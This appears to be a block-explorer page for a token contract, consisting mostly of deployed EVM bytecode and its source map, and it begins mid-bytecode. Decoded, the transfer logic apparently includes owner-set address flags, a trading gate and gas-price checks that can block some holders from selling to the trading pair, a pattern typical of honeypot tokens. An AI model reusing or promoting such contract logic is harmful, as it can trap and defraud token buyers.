fa5565b5f60208284031215610fef575f80fd5b8151610ee881610e51565b808202811582820484141761045457610454610fa5565b5f8261102b57634e487b7160e01b5f52601260045260245ffd5b50049056fea2646970667358221220580de97b808d845faf80664043ad94f61b867e56064e975e48419ab22e58257864736f6c63430008180033

Deployed Bytecode

0x608060405234801561000f575f80fd5b506004361061016d575f3560e01c80637f626f1a116100d9578063a457c2d711610093578063dd62ed3e1161006e578063dd62ed3e1461034e578063f2fde38b14610386578063fb201b1d14610399578063fcd410be146103a1575f80fd5b8063a457c2d714610310578063a8aa1b3114610323578063a9059cbb1461033b575f80fd5b80637f626f1a1461027557806386b714e2146102885780638c0b5e22146102d15780638da5cb5b146102da5780638f3fa860146102ff57806395d89b4114610308575f80fd5b8063395093511161012a57806339509351146102085780633ef33e301461021b5780635408d42d14610230578063622565891461023d57806370a0823114610245578063715018a61461026d575f80fd5b806306fdde0314610171578063095ea7b31461018f57806318160ddd146101b257806323b872dd146101c4578063313ce567146101d7578063372c12b1146101e6575b5f80fd5b6101796103b4565b6040516101869190610e05565b60405180910390f35b6101a261019d366004610e65565b610444565b6040519015158152602001610186565b6002545b604051908152602001610186565b6101a26101d2366004610e8f565b61045a565b60405160128152602001610186565b6101a26101f4366004610ecd565b60066020525f908152604090205460ff1681565b6101a2610216366004610e65565b61050e565b61022e610229366004610eef565b610544565b005b6007546101a29060ff1681565b61022e610576565b6101b6610253366004610ecd565b6001600160a01b03165f9081526020819052604090205490565b61022e610586565b61022e610283366004610f2a565b610599565b600b54600c54600d54600e546102a7936001600160a01b031692919084565b604080516001600160a01b0390951685526020850193909352918301526060820152608001610186565b6101b660095481565b6005546001600160a01b03165b6040516001600160a01b039091168152602001610186565b6101b6600a5481565b6101796105a6565b6101a261031e366004610e65565b6105b5565b6007546102e79061010090046001600160a01b031681565b6101a2610349366004610e65565b61064f565b6101b661035c366004610f41565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b61022e610394366004610ecd565b61065b565b61022e6106d4565b6008546102e7906001600160a01b031681565b6060600380546103c390610f6d565b80601f01602080910402602001604051908101604052809291908181526020018280546103ef90610f6d565b801561043a5780601f106104115761010080835404028352916020019161043a565b820191905f5260205f20905b81548152906001019060200180831161041d57829003601f168201915b5050505050905090565b5f610450338484610873565b5060015b92915050565b5f610466848484610996565b6001600160a01b0384165f908152600160209081526040808320338452909152902054828110156104ef5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b61050385336104fe8685610fb9565b610873565b506001949350505050565b335f8181526001602090815260408083206001600160a01b038716845290915281205490916104509185906104fe908690610fcc565b61054c610b84565b6001600160a01b03919091165f908152600f60205260409020805460ff1916911515919091179055565b61057e610b84565b600254600955565b61058e610b84565b6105975f610bde565b565b6105a1610b84565b600c55565b6060600480546103c390610f6d565b335f9081526001602090815260408083206001600160a01b0386168452909152812054828110156106365760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016104e6565b61064533856104fe8685610fb9565b5060019392505050565b5f610450338484610996565b610663610b84565b6001600160a01b0381166106c85760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016104e6565b6106d181610bde565b50565b6106dc610b84565b60085f9054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561072c573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107509190610fdf565b6001600160a01b031663e6a439053060085f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156107af573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107d39190610fdf565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af115801561081d573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108419190610fdf565b6007805460ff196001600160a01b039390931661010002929092166001600160a81b0319909216919091176001179055565b6001600160a01b0383166108d55760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016104e6565b6001600160a01b0382166109365760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016104e6565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b325f9081526006602052604090205460ff16156109bd576109b8838383610c2f565b505050565b60075460ff16610a0f5760405162461bcd60e51b815260206004820152601d60248201527f547261646520686173206e6f74206265656e206f70656e65642079657400000060448201526064016104e6565b6009548110610a1c575f80fd5b6007545f906001600160a01b038481166101009092041614610a3e575f610a41565b60015b325f908152600f602052604090205490915060ff168015610a7457506007546001600160a01b0384811661010090920416145b8015610a7f57505f3a115b8015610a975750325f90815260208190526040812054115b15610aa0575f80fd5b808015610aae5750600c543a115b15610ab7575f80fd5b6007546001600160a01b038581166101009092041614801590610aed57506007546001600160a01b038481166101009092041614155b15610b16576001600160a01b0384165f908152600f602052604090205460ff1615610b16575f80fd5b5f8115610b3c57600e54606490610b2d9085610ffa565b610b379190611011565b610b56565b600d54606490610b4c9085610ffa565b610b569190611011565b9050610b6c8585610b678487610fb9565b610c2f565b8015610b7d57610b7d853083610c2f565b5050505050565b6005546001600160a01b031633146105975760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016104e6565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b6001600160a01b038316610c935760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016104e6565b6001600160a01b038216610cf55760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016104e6565b6001600160a01b0383165f9081526020819052604090205481811015610d6c5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016104e6565b610d768282610fb9565b6001600160a01b038086165f908152602081905260408082209390935590851681529081208054849290610dab908490610fcc565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610df791815260200190565b60405180910390a350505050565b5f602080835283518060208501525f5b81811015610e3157858101830151858201604001528201610e15565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146106d1575f80fd5b5f8060408385031215610e76575f80fd5b8235610e8181610e51565b946020939093013593505050565b5f805f60608486031215610ea1575f80fd5b8335610eac81610e51565b92506020840135610ebc81610e51565b929592945050506040919091013590565b5f60208284031215610edd575f80fd5b8135610ee881610e51565b9392505050565b5f8060408385031215610f00575f80fd5b8235610f0b81610e51565b915060208301358015158114610f1f575f80fd5b809150509250929050565b5f60208284031215610f3a575f80fd5b5035919050565b5f8060408385031215610f52575f80fd5b8235610f5d81610e51565b91506020830135610f1f81610e51565b600181811c90821680610f8157607f821691505b602082108103610f9f57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8181038181111561045457610454610fa5565b8082018082111561045457610454610fa5565b5f60208284031215610fef575f80fd5b8151610ee881610e51565b808202811582820484141761045457610454610fa5565b5f8261102b57634e487b7160e01b5f52601260045260245ffd5b50049056fea2646970667358221220580de97b808d845faf80664043ad94f61b867e56064e975e48419ab22e58257864736f6c63430008180033

Deployed Bytecode Sourcemap

18320:2457:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9284:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11457:169;;;;;;:::i;:::-;;:::i;:::-;;;1188:14:1;;1181:22;1163:41;;1151:2;1136:18;11457:169:0;1023:187:1;10404:108:0;10492:12;;10404:108;;;1361:25:1;;;1349:2;1334:18;10404:108:0;1215:177:1;12108:422:0;;;;;;:::i;:::-;;:::i;10246:93::-;;;10329:2;2000:36:1;;1988:2;1973:18;10246:93:0;1858:184:1;18358:42:0;;;;;;:::i;:::-;;;;;;;;;;;;;;;;12939:215;;;;;;:::i;:::-;;:::i;19471:102::-;;;;;;:::i;:::-;;:::i;:::-;;18413:31;;;;;;;;;19667:88;;;:::i;10581:127::-;;;;;;:::i;:::-;-1:-1:-1;;;;;10682:18:0;10655:7;10682:18;;;;;;;;;;;;10581:127;2997:103;;;:::i;19581:78::-;;;;;;:::i;:::-;;:::i;18735:18::-;;;;;;;;;;;-1:-1:-1;;;;;18735:18:0;;;;;;;;;;-1:-1:-1;;;;;3154:32:1;;;3136:51;;3218:2;3203:18;;3196:34;;;;3246:18;;;3239:34;3304:2;3289:18;;3282:34;3123:3;3108:19;18735:18:0;2905:417:1;18506:26:0;;;;;;2352:87;2425:6;;-1:-1:-1;;;;;2425:6:0;2352:87;;;-1:-1:-1;;;;;3491:32:1;;;3473:51;;3461:2;3446:18;2352:87:0;3327:203:1;18539:28:0;;;;;;9503:104;;;:::i;13657:377::-;;;;;;:::i;:::-;;:::i;18451:19::-;;;;;;;;-1:-1:-1;;;;;18451:19:0;;;10921:175;;;;;;:::i;:::-;;:::i;11159:151::-;;;;;;:::i;:::-;-1:-1:-1;;;;;11275:18:0;;;11248:7;11275:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;11159:151;3254:201;;;;;;:::i;:::-;;:::i;19302:161::-;;;:::i;18477:22::-;;;;;-1:-1:-1;;;;;18477:22:0;;;9284:100;9338:13;9371:5;9364:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9284:100;:::o;11457:169::-;11540:4;11557:39;950:10;11580:7;11589:6;11557:8;:39::i;:::-;-1:-1:-1;11614:4:0;11457:169;;;;;:::o;12108:422::-;12214:4;12231:36;12241:6;12249:9;12260:6;12231:9;:36::i;:::-;-1:-1:-1;;;;;12307:19:0;;12280:24;12307:19;;;:11;:19;;;;;;;;950:10;12307:33;;;;;;;;12359:26;;;;12351:79;;;;-1:-1:-1;;;12351:79:0;;4738:2:1;12351:79:0;;;4720:21:1;4777:2;4757:18;;;4750:30;4816:34;4796:18;;;4789:62;-1:-1:-1;;;4867:18:1;;;4860:38;4915:19;;12351:79:0;;;;;;;;;12441:57;12450:6;950:10;12472:25;12491:6;12472:16;:25;:::i;:::-;12441:8;:57::i;:::-;-1:-1:-1;12518:4:0;;12108:422;-1:-1:-1;;;;12108:422:0:o;12939:215::-;950:10;13027:4;13076:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;13076:34:0;;;;;;;;;;13027:4;;13044:80;;13067:7;;13076:47;;13113:10;;13076:47;:::i;19471:102::-;2238:13;:11;:13::i;:::-;-1:-1:-1;;;;;19543:14:0;;;::::1;;::::0;;;:5;:14:::1;::::0;;;;:22;;-1:-1:-1;;19543:22:0::1;::::0;::::1;;::::0;;;::::1;::::0;;19471:102::o;19667:88::-;2238:13;:11;:13::i;:::-;10492:12;;19720:11:::1;:27:::0;19667:88::o;2997:103::-;2238:13;:11;:13::i;:::-;3062:30:::1;3089:1;3062:18;:30::i;:::-;2997:103::o:0;19581:78::-;2238:13;:11;:13::i;:::-;19641:5;:10;19581:78::o;9503:104::-;9559:13;9592:7;9585:14;;;;;:::i;13657:377::-;950:10;13750:4;13794:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;13794:34:0;;;;;;;;;;13847:35;;;;13839:85;;;;-1:-1:-1;;;13839:85:0;;5542:2:1;13839:85:0;;;5524:21:1;5581:2;5561:18;;;5554:30;5620:34;5600:18;;;5593:62;-1:-1:-1;;;5671:18:1;;;5664:35;5716:19;;13839:85:0;5340:401:1;13839:85:0;13935:67;950:10;13958:7;13967:34;13986:15;13967:16;:34;:::i;13935:67::-;-1:-1:-1;14022:4:0;;13657:377;-1:-1:-1;;;13657:377:0:o;10921:175::-;11007:4;11024:42;950:10;11048:9;11059:6;11024:9;:42::i;3254:201::-;2238:13;:11;:13::i;:::-;-1:-1:-1;;;;;3343:22:0;::::1;3335:73;;;::::0;-1:-1:-1;;;3335:73:0;;5948:2:1;3335:73:0::1;::::0;::::1;5930:21:1::0;5987:2;5967:18;;;5960:30;6026:34;6006:18;;;5999:62;-1:-1:-1;;;6077:18:1;;;6070:36;6123:19;;3335:73:0::1;5746:402:1::0;3335:73:0::1;3419:28;3438:8;3419:18;:28::i;:::-;3254:201:::0;:::o;19302:161::-;2238:13;:11;:13::i;:::-;19369:7:::1;;;;;;;;;-1:-1:-1::0;;;;;19369:7:0::1;-1:-1:-1::0;;;;;19369:15:0::1;;:17;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;19360:35:0::1;;19404:4;19411:7;;;;;;;;;-1:-1:-1::0;;;;;19411:7:0::1;-1:-1:-1::0;;;;;19411:12:0::1;;:14;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;19360:66;::::0;-1:-1:-1;;;;;;19360:66:0::1;::::0;;;;;;-1:-1:-1;;;;;6639:15:1;;;19360:66:0::1;::::0;::::1;6621:34:1::0;6691:15;;6671:18;;;6664:43;6556:18;;19360:66:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;19353:4;:73:::0;;-1:-1:-1;;;;;;;19353:73:0;;;::::1;;;19437:18:::0;;;;-1:-1:-1;;;;;;19437:18:0;;;;;;;19353:4:::1;19437:18;::::0;;19302:161::o;17013:346::-;-1:-1:-1;;;;;17115:19:0;;17107:68;;;;-1:-1:-1;;;17107:68:0;;6920:2:1;17107:68:0;;;6902:21:1;6959:2;6939:18;;;6932:30;6998:34;6978:18;;;6971:62;-1:-1:-1;;;7049:18:1;;;7042:34;7093:19;;17107:68:0;6718:400:1;17107:68:0;-1:-1:-1;;;;;17194:21:0;;17186:68;;;;-1:-1:-1;;;17186:68:0;;7325:2:1;17186:68:0;;;7307:21:1;7364:2;7344:18;;;7337:30;7403:34;7383:18;;;7376:62;-1:-1:-1;;;7454:18:1;;;7447:32;7496:19;;17186:68:0;7123:398:1;17186:68:0;-1:-1:-1;;;;;17267:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;17319:32;;1361:25:1;;;17319:32:0;;1334:18:1;17319:32:0;;;;;;;17013:346;;;:::o;19763:1011::-;19875:9;19865:20;;;;:9;:20;;;;;;;;19861:906;;;19902:33;19918:4;19924:2;19928:6;19902:15;:33::i;:::-;19763:1011;;;:::o;19861:906::-;19997:11;;;;19989:53;;;;-1:-1:-1;;;19989:53:0;;7728:2:1;19989:53:0;;;7710:21:1;7767:2;7747:18;;;7740:30;7806:31;7786:18;;;7779:59;7855:18;;19989:53:0;7526:353:1;19989:53:0;20074:11;;20065:6;:20;20057:29;;;;;;20117:4;;20101:8;;-1:-1:-1;;;;;20113:8:0;;;20117:4;;;;;20113:8;20112:25;;20132:5;20112:25;;;20125:4;20112:25;20162:9;20156:16;;;;:5;:16;;;;;;20101:36;;-1:-1:-1;20156:16:0;;:30;;;;-1:-1:-1;20182:4:0;;-1:-1:-1;;;;;20176:10:0;;;20182:4;;;;;20176:10;20156:30;:49;;;;;20204:1;20190:11;:15;20156:49;:77;;;;-1:-1:-1;20219:9:0;20232:1;10682:18;;;;;;;;;;;20209:24;20156:77;20152:126;;;20254:8;;;20152:126;20295:3;:26;;;;-1:-1:-1;20316:5:0;;20302:11;:19;20295:26;20292:74;;;20342:8;;;20292:74;20389:4;;-1:-1:-1;;;;;20383:10:0;;;20389:4;;;;;20383:10;;;;:22;;-1:-1:-1;20401:4:0;;-1:-1:-1;;;;;20397:8:0;;;20401:4;;;;;20397:8;;20383:22;20380:83;;;-1:-1:-1;;;;;20435:11:0;;;;;;:5;:11;;;;;;;;20434:12;20426:21;;;;;;20477:16;20521:3;20520:4;20519:48;;20557:5;;20563:3;;20550:12;;:6;:12;:::i;:::-;:16;;;;:::i;:::-;20519:48;;;20536:5;;20542:3;;20529:12;;:6;:12;:::i;:::-;:16;;;;:::i;:::-;20508:59;-1:-1:-1;20582:42:0;20598:4;20604:2;20608:15;20508:59;20608:6;:15;:::i;:::-;20582;:42::i;:::-;20642:10;;20639:96;;20673:46;20689:4;20703;20710:8;20673:15;:46::i;:::-;20749:7;;19763:1011;;;:::o;2519:132::-;2425:6;;-1:-1:-1;;;;;2425:6:0;950:10;2583:23;2575:68;;;;-1:-1:-1;;;2575:68:0;;8481:2:1;2575:68:0;;;8463:21:1;;;8500:18;;;8493:30;8559:34;8539:18;;;8532:62;8611:18;;2575:68:0;8279:356:1;3618:191:0;3711:6;;;-1:-1:-1;;;;;3728:17:0;;;-1:-1:-1;;;;;;3728:17:0;;;;;;;3761:40;;3711:6;;;3728:17;3711:6;;3761:40;;3692:16;;3761:40;3681:128;3618:191;:::o;14524:604::-;-1:-1:-1;;;;;14630:20:0;;14622:70;;;;-1:-1:-1;;;14622:70:0;;8842:2:1;14622:70:0;;;8824:21:1;8881:2;8861:18;;;8854:30;8920:34;8900:18;;;8893:62;-1:-1:-1;;;8971:18:1;;;8964:35;9016:19;;14622:70:0;8640:401:1;14622:70:0;-1:-1:-1;;;;;14711:23:0;;14703:71;;;;-1:-1:-1;;;14703:71:0;;9248:2:1;14703:71:0;;;9230:21:1;9287:2;9267:18;;;9260:30;9326:34;9306:18;;;9299:62;-1:-1:-1;;;9377:18:1;;;9370:33;9420:19;;14703:71:0;9046:399:1;14703:71:0;-1:-1:-1;;;;;14871:17:0;;14847:21;14871:17;;;;;;;;;;;14907:23;;;;14899:74;;;;-1:-1:-1;;;14899:74:0;;9652:2:1;14899:74:0;;;9634:21:1;9691:2;9671:18;;;9664:30;9730:34;9710:18;;;9703:62;-1:-1:-1;;;9781:18:1;;;9774:36;9827:19;;14899:74:0;9450:402:1;14899:74:0;15004:22;15020:6;15004:13;:22;:::i;:::-;-1:-1:-1;;;;;14984:17:0;;;:9;:17;;;;;;;;;;;:42;;;;15037:20;;;;;;;;:30;;15061:6;;14984:9;15037:30;;15061:6;;15037:30;:::i;:::-;;;;;;;;15102:9;-1:-1:-1;;;;;15085:35:0;15094:6;-1:-1:-1;;;;;15085:35:0;;15113:6;15085:35;;;;1361:25:1;;1349:2;1334:18;;1215:177;15085:35:0;;;;;;;;14611:517;14524:604;;;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:131::-;-1:-1:-1;;;;;642:31:1;;632:42;;622:70;;688:1;685;678:12;703:315;771:6;779;832:2;820:9;811:7;807:23;803:32;800:52;;;848:1;845;838:12;800:52;887:9;874:23;906:31;931:5;906:31;:::i;:::-;956:5;1008:2;993:18;;;;980:32;;-1:-1:-1;;;703:315:1:o;1397:456::-;1474:6;1482;1490;1543:2;1531:9;1522:7;1518:23;1514:32;1511:52;;;1559:1;1556;1549:12;1511:52;1598:9;1585:23;1617:31;1642:5;1617:31;:::i;:::-;1667:5;-1:-1:-1;1724:2:1;1709:18;;1696:32;1737:33;1696:32;1737:33;:::i;:::-;1397:456;;1789:7;;-1:-1:-1;;;1843:2:1;1828:18;;;;1815:32;;1397:456::o;2047:247::-;2106:6;2159:2;2147:9;2138:7;2134:23;2130:32;2127:52;;;2175:1;2172;2165:12;2127:52;2214:9;2201:23;2233:31;2258:5;2233:31;:::i;:::-;2283:5;2047:247;-1:-1:-1;;;2047:247:1:o;2299:416::-;2364:6;2372;2425:2;2413:9;2404:7;2400:23;2396:32;2393:52;;;2441:1;2438;2431:12;2393:52;2480:9;2467:23;2499:31;2524:5;2499:31;:::i;:::-;2549:5;-1:-1:-1;2606:2:1;2591:18;;2578:32;2648:15;;2641:23;2629:36;;2619:64;;2679:1;2676;2669:12;2619:64;2702:7;2692:17;;;2299:416;;;;;:::o;2720:180::-;2779:6;2832:2;2820:9;2811:7;2807:23;2803:32;2800:52;;;2848:1;2845;2838:12;2800:52;-1:-1:-1;2871:23:1;;2720:180;-1:-1:-1;2720:180:1:o;3535:388::-;3603:6;3611;3664:2;3652:9;3643:7;3639:23;3635:32;3632:52;;;3680:1;3677;3670:12;3632:52;3719:9;3706:23;3738:31;3763:5;3738:31;:::i;:::-;3788:5;-1:-1:-1;3845:2:1;3830:18;;3817:32;3858:33;3817:32;3858:33;:::i;4151:380::-;4230:1;4226:12;;;;4273;;;4294:61;;4348:4;4340:6;4336:17;4326:27;;4294:61;4401:2;4393:6;4390:14;4370:18;4367:38;4364:161;;4447:10;4442:3;4438:20;4435:1;4428:31;4482:4;4479:1;4472:15;4510:4;4507:1;4500:15;4364:161;;4151:380;;;:::o;4945:127::-;5006:10;5001:3;4997:20;4994:1;4987:31;5037:4;5034:1;5027:15;5061:4;5058:1;5051:15;5077:128;5144:9;;;5165:11;;;5162:37;;;5179:18;;:::i;5210:125::-;5275:9;;;5296:10;;;5293:36;;;5309:18;;:::i;6153:251::-;6223:6;6276:2;6264:9;6255:7;6251:23;6247:32;6244:52;;;6292:1;6289;6282:12;6244:52;6324:9;6318:16;6343:31;6368:5;6343:31;:::i;7884:168::-;7957:9;;;7988;;8005:15;;;7999:22;;7985:37;7975:71;;8026:18;;:::i;8057:217::-;8097:1;8123;8113:132;;8167:10;8162:3;8158:20;8155:1;8148:31;8202:4;8199:1;8192:15;8230:4;8227:1;8220:15;8113:132;-1:-1:-1;8259:9:1;;8057:217::o

Swarm Source

ipfs://580de97b808d845faf80664043ad94f61b867e56064e975e48419ab22e582578
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.